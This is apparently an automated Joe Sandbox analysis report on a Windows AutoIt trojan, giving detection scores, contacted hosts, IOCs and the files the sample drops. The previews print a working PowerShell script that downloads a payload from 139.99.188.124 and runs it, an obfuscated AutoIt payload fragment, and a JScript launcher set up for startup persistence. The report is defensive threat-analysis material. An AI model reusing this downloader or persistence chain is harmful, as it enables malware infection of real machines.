Process Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
Access Token Manipulation		Proc Filesystem11
Application Window Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
Process Injection		/etc/passwd and /etc/shadow1
System Owner/User Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583285 Sample: cxZuGa.exe Startdate: 02/01/2025 Architecture: WINDOWS Score: 100 50 nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs 2->50 54 Suricata IDS alerts for network traffic 2->54 56 Icon mismatch, binary includes an icon from a different legit application in order to fool users 2->56 58 Multi AV Scanner detection for submitted file 2->58 60 10 other signatures 2->60 10 cxZuGa.exe 1 2->10         started        14 wscript.exe 1 1 2->14         started        signatures3 process4 file5 48 C:\Users\Public\PublicProfile.ps1, ASCII 10->48 dropped 68 Suspicious powershell command line found 10->68 70 Binary is likely a compiled AutoIt script file 10->70 72 Bypasses PowerShell execution policy 10->72 16 powershell.exe 17 10->16         started        19 powershell.exe 14 16 10->19         started        74 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->74 23 SwiftWrite.pif 14->23         started        signatures6 process7 dnsIp8 38 C:\Users\Public\Secure.au3, Unicode 16->38 dropped 25 Guard.exe 4 16->25         started        29 conhost.exe 16->29         started        52 139.99.188.124, 49704, 49705, 80 OVHFR Canada 19->52 40 C:\Users\Publicbehaviorgraphuard.exe, PE32 19->40 dropped 62 Drops PE files to the user root directory 19->62 64 Powershell drops PE file 19->64 31 conhost.exe 19->31         started        file9 signatures10 process11 file12 44 C:\Users\user\AppData\...\SwiftWrite.pif, PE32 25->44 dropped 46 C:\Users\user\AppData\Local\...\SwiftWrite.js, ASCII 25->46 dropped 66 Drops PE files with a suspicious file extension 25->66 33 cmd.exe 2 25->33         started        signatures13 process14 file15 42 C:\Users\user\AppData\...\SwiftWrite.url, MS 33->42 dropped 36 conhost.exe 33->36         started        process16

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
cxZuGa.exe45%ReversingLabsWin64.Trojan.AutoitInject
cxZuGa.exe61%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\Public\Guard.exe8%ReversingLabs
C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif8%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://crl.microsoftH0%Avira URL Cloudsafe
http://139.99.188.124/kYCQj.txt0%Avira URL Cloudsafe
http://139.99.H2.0%Avira URL Cloudsafe
http://139.99.188.124/TSKUVpnJ0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
unknown
unknownfalse
    		unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://139.99.188.124/TSKUVpnJtrue
    • Avira URL Cloud: safe
    		unknown
    http://139.99.188.124/kYCQj.txttrue
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://www.autoitscript.com/autoit3/JGuard.exe, 00000006.00000002.3264677363.0000000000CF9000.00000002.00000001.01000000.00000007.sdmp, Guard.exe, 00000006.00000003.2121750988.000000000465A000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif, 0000000B.00000002.3264616200.00000000006B9000.00000002.00000001.01000000.00000009.sdmp, SwiftWrite.pif.6.dr, Guard.exe.1.drfalse
      		high
      http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2121724159.0000023662EF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2097758108.0000023654878000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000004.00000002.2097758108.00000236544B3000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://crl.microsoftHpowershell.exe, 00000004.00000002.2097448709.0000023651695000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2097758108.000002365472D000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://139.99.188.124powershell.exe, 00000004.00000002.2097758108.00000236530A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2097758108.0000023653FC4000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2097758108.000002365472D000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://go.micropowershell.exe, 00000004.00000002.2097758108.0000023653FC4000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://contoso.com/powershell.exe, 00000004.00000002.2097758108.0000023654878000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2121724159.0000023662EF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2097758108.0000023654878000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://contoso.com/Licensepowershell.exe, 00000004.00000002.2097758108.0000023654878000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://contoso.com/Iconpowershell.exe, 00000004.00000002.2097758108.0000023654878000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://oneget.orgXpowershell.exe, 00000004.00000002.2097758108.00000236544B3000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://aka.ms/pscore68powershell.exe, 00000004.00000002.2097758108.0000023652E81000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://139.99.H2.powershell.exe, 00000004.00000002.2097758108.00000236544AB000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.autoitscript.com/autoit3/Guard.exe, 00000006.00000003.2121750988.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000006.00000002.3266463703.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.6.dr, Guard.exe.1.drfalse
                                		high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.2097758108.0000023652E81000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2097758108.000002365472D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://oneget.orgpowershell.exe, 00000004.00000002.2097758108.00000236544B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      139.99.188.124
                                      		unknownCanada
                                      		16276OVHFRtrue

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1583285
                                      Start date and time:2025-01-02 10:54:05 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 8m 33s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:13
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:cxZuGa.exe
                                      Detection:MAL
                                      Classification:mal100.expl.evad.winEXE@15/12@2/1
                                      EGA Information:
                                      • Successful, ratio: 75%
                                      HCA Information:
                                      • Successful, ratio: 99%
                                      • Number of executed functions: 48
                                      • Number of non-executed functions: 243
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe

                                      Warnings

                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                      • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target powershell.exe, PID 940 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      04:54:53API Interceptor57x Sleep call for process: powershell.exe modified
                                      04:55:39API Interceptor2960x Sleep call for process: Guard.exe modified
                                      04:55:57API Interceptor1914x Sleep call for process: SwiftWrite.pif modified
                                      10:55:06AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      139.99.188.124nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                      • 139.99.188.124/QWCheljD.txt
                                      7A2lfjTYNf.lnkGet hashmaliciousUnknownBrowse
                                      • 139.99.188.124/VmnWBYrzn.txt
                                      6fW0guYpsH.lnkGet hashmaliciousUnknownBrowse
                                      • 139.99.188.124/QWCheljD.txt
                                      R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                      • 139.99.188.124/QWCheljD.txt
                                      R8CAg00Db8.lnkGet hashmaliciousUnknownBrowse
                                      • 139.99.188.124/QWCheljD.txt
                                      s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                      • 139.99.188.124/EsgMle.txt
                                      EO3RT0fEfb.exeGet hashmaliciousUnknownBrowse
                                      • 139.99.188.124/ucZfzm.txt
                                      RMBOriPHVJ.exeGet hashmaliciousUnknownBrowse
                                      • 139.99.188.124/mzmLv.txt
                                      S6x3K8vzCA.exeGet hashmaliciousUnknownBrowse
                                      • 139.99.188.124/wPBPjuY.txt
                                      PPbimZI4LV.exeGet hashmaliciousUnknownBrowse
                                      • 139.99.188.124/BlQMSgJx.txt

                                      Domains

                                      No context

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      OVHFRhttps://tr171139818.amoliani.com/c/mm14r39/e-v_xxa-/imz77nt3npsGet hashmaliciousUnknownBrowse
                                      • 213.32.5.20
                                      book-captcha.com.htmlGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                      • 91.134.9.159
                                      armv7l.elfGet hashmaliciousUnknownBrowse
                                      • 91.134.44.56
                                      aAcx14Rjtw.exeGet hashmaliciousXmrigBrowse
                                      • 146.59.154.106
                                      DF2.exeGet hashmaliciousUnknownBrowse
                                      • 51.83.132.16
                                      https://mmm.askfollow.us/#CRDGet hashmaliciousUnknownBrowse
                                      • 54.38.113.8
                                      http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26destination%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8XGet hashmaliciousUnknownBrowse
                                      • 217.182.178.234
                                      https://t.co/YjyGioQuKTGet hashmaliciousUnknownBrowse
                                      • 54.38.113.7
                                      http://tracking.b2bmktvault.com/tracking/click?d=qPk_c18mu4tAnpVkjkvM74XnWEgCEJFMr0kmnRaZVETZIbfUm-V7axMnjqAoCLnqzaVyNRK36FUkPva8vnzGVvH9cqu1JpLb-vxN3FkjjYhK51_3JrkS14Hcuqb1FOJE1bnSPADYUAMl8knPwYz7btXcOUX9DY4_AjytTbLRGEQ0R8vUhh6vaa-KBtd0YdWGVJFQli_mKczqrYpzYk33dCMwBXQR8R8u2JajJsC51OFcIlRSs_l3i1d9MQf5ZYWuxV_Ytx1pTi2iUY6P97JH0U81Get hashmaliciousUnknownBrowse
                                      • 188.165.1.80
                                      http://tracking.b2bmktvault.com/tracking/click?d=qPk_c18mu4tAnpVkjkvM74XnWEgCEJFMr0kmnRaZVETZIbfUm-V7axMnjqAoCLnqzaVyNRK36FUkPva8vnzGVvH9cqu1JpLb-vxN3FkjjYhK51_3JrkS14Hcuqb1FOJE1bnSPADYUAMl8knPwYz7btXcOUX9DY4_AjytTbLRGEQ0R8vUhh6vaa-KBtd0YdWGu732v1MZ_EelGtWldAkkdtYGfnD-GIQEN8fgQfvllyKpzr3-J0fwpuBZsUPy3J_TvPM8sfKRevcMTcDv6eAynng1Get hashmaliciousUnknownBrowse
                                      • 46.105.88.234

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      C:\Users\Public\Guard.exetzA45NGAW4.lnkGet hashmaliciousUnknownBrowse
                                        TCKxnQ5CPn.exeGet hashmaliciousUnknownBrowse
                                          n5Szx8qsFB.lnkGet hashmaliciousUnknownBrowse
                                            nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                              7A2lfjTYNf.lnkGet hashmaliciousUnknownBrowse
                                                6fW0guYpsH.lnkGet hashmaliciousUnknownBrowse
                                                  FzmtNV0vnG.lnkGet hashmaliciousUnknownBrowse
                                                    lKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                                      R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                        R8CAg00Db8.lnkGet hashmaliciousUnknownBrowse

                                                          Created / dropped Files

                                                          C:\Users\Public\Guard.exe

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):893608
                                                          Entropy (8bit):6.62028134425878
                                                          Encrypted:false
                                                          SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                          MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                          SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                          SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                          SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          Joe Sandbox View:
                                                          • Filename: tzA45NGAW4.lnk, Detection: malicious, Browse
                                                          • Filename: TCKxnQ5CPn.exe, Detection: malicious, Browse
                                                          • Filename: n5Szx8qsFB.lnk, Detection: malicious, Browse
                                                          • Filename: nTyPEbq9wQ.lnk, Detection: malicious, Browse
                                                          • Filename: 7A2lfjTYNf.lnk, Detection: malicious, Browse
                                                          • Filename: 6fW0guYpsH.lnk, Detection: malicious, Browse
                                                          • Filename: FzmtNV0vnG.lnk, Detection: malicious, Browse
                                                          • Filename: lKin1m7Pf2.lnk, Detection: malicious, Browse
                                                          • Filename: R4qP4YM0QX.lnk, Detection: malicious, Browse
                                                          • Filename: R8CAg00Db8.lnk, Detection: malicious, Browse
                                                          Reputation:moderate, very likely benign file
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                                          C:\Users\Public\PublicProfile.ps1

                                                          Download File
                                                          Process:C:\Users\user\Desktop\cxZuGa.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):483
                                                          Entropy (8bit):5.277432583118796
                                                          Encrypted:false
                                                          SSDEEP:12:f73/o3FEoFnV/9LBzFj0zUQbnRS6SxJMnCPTFM:f73/QCknZ9LzjYnRSb8Cba
                                                          MD5:59445FB52E59565BFC7DCDAC3DC6794D
                                                          SHA1:D23671A061E5287E65B3421DBED2453B44046B01
                                                          SHA-256:24E61D47CE6243A53A0C964487F9F7C7919AFE6639873686945945BE1870241B
                                                          SHA-512:BF77D99E87A7EF4F2912528B4209FCCDA85A8AD90FEE38DEA5A3CA37616434448B1991F2AF8DC7926F71B5B811A76772BEAEDD4271FB1316D2781FEA15E48DCC
                                                          Malicious:true
                                                          Preview:[string]$fU5L = "http://139.99.188.124/kYCQj.txt"..[string]$oF6L = "C:\Users\Public\Secure.au3"..[string]$exePath = "C:\Users\Public\Guard.exe"....# Download the content from the URL..$wResp = New-Object System.Net.WebClient..$fCont = $wResp.DownloadString($fU5L)....# Save the downloaded content to the output file..Set-Content -Path $oF6L -Value $fCont -Encoding UTF8....# Run the executable with the output file as an argument..Start-Process -FilePath $exePath -ArgumentList $oF6L

                                                          C:\Users\Public\Secure.au3

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1266)
                                                          Category:dropped
                                                          Size (bytes):1245639
                                                          Entropy (8bit):5.141396699944807
                                                          Encrypted:false
                                                          SSDEEP:12288:28V+jcfSFQnlVOwPl19n0GJIGKvgW6X3YIUTtlnmo39FTtd:qcWQ1zJzQ3T7mo39t
                                                          MD5:49B77C2654D10A0285E01565FE3E0E7C
                                                          SHA1:CA864F6F60EF47B48EE8396FBCE3434B7023BFC8
                                                          SHA-256:1C725E077489EC594E58469A258127AF611A6F4F0792DF9045A21B64E6A49810
                                                          SHA-512:9FC606E901BE4F3BBDE92DE33105310E1522309B18CA72DFB97A1A71CF52A9BB9ED70ED68C5B6BB9D315C88657E740225A1275E19781587AF25564CD4B456B1F
                                                          Malicious:true
                                                          Preview:.Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64
                                                          Entropy (8bit):0.34726597513537405
                                                          Encrypted:false
                                                          SSDEEP:3:Nlll:Nll
                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                          Malicious:false
                                                          Preview:@...e...........................................................

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2kfl2jcw.pmc.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e0ic0idz.ggy.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_igdazeuj.3lr.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_udnjo5jz.wek.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\WordGenius Technologies\G

                                                          Download File
                                                          Process:C:\Users\Public\Guard.exe
                                                          File Type:ASCII text, with very long lines (1266)
                                                          Category:dropped
                                                          Size (bytes):1245636
                                                          Entropy (8bit):5.141356841387749
                                                          Encrypted:false
                                                          SSDEEP:12288:D8V+jcfSFQnlVOwPl19n0GJIGKvgW6X3YIUTtlnmo39FTtd:DcWQ1zJzQ3T7mo39t
                                                          MD5:F743A5AC42FF1580C8017446536489C7
                                                          SHA1:F7940706E14AF13B9F27429F0F4860D34F154545
                                                          SHA-256:EBB1AF9C34063B09754040D029EDB06CE178B33450F3E683FD9B8E2E17320AC2
                                                          SHA-512:D73989BE4C8E025EB55A9C57BB509E8F69996B3D705EC27CE81A1683B50F0EA48614DACC81DF91DE14E7AAFADF3026014A5D1667608EBB59D79D2CCAA8784238
                                                          Malicious:false
                                                          Preview:Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]96]

                                                          C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js

                                                          Download File
                                                          Process:C:\Users\Public\Guard.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):186
                                                          Entropy (8bit):4.7401751318145395
                                                          Encrypted:false
                                                          SSDEEP:3:RiMIpGXfeNH5E5wWAX+aJp6/h4EkD5yKXW/Zi+0/RaMl85uWAX+aJp6/h4EkD5yn:RiJbNHCwWDaJ0/hJkDrXW/Zz0tl8wWDH
                                                          MD5:633E34C077F6828A474217CE7DE57BED
                                                          SHA1:6C7EF480F22DE38D9EDF82EF35C4F5943540E164
                                                          SHA-256:FE9F225D70AC67046F622C2F52E17CB8CEDD111F51AEAA17C5ADBE48846E21AF
                                                          SHA-512:358C0EBBA88DA82FCDDE3D1C518C559DADBA02E7D5935A5D12BBC5D1463A8BA094FC2AD186CDE82316010E1C4C5E18C2314C4FED70DB433C39C8FF3015577995
                                                          Malicious:true
                                                          Preview:new ActiveXObject("Wscript.Shell").Run("\"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\SwiftWrite.pif\" \"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\G\"")

                                                          C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif

                                                          Download File
                                                          Process:C:\Users\Public\Guard.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):893608
                                                          Entropy (8bit):6.62028134425878
                                                          Encrypted:false
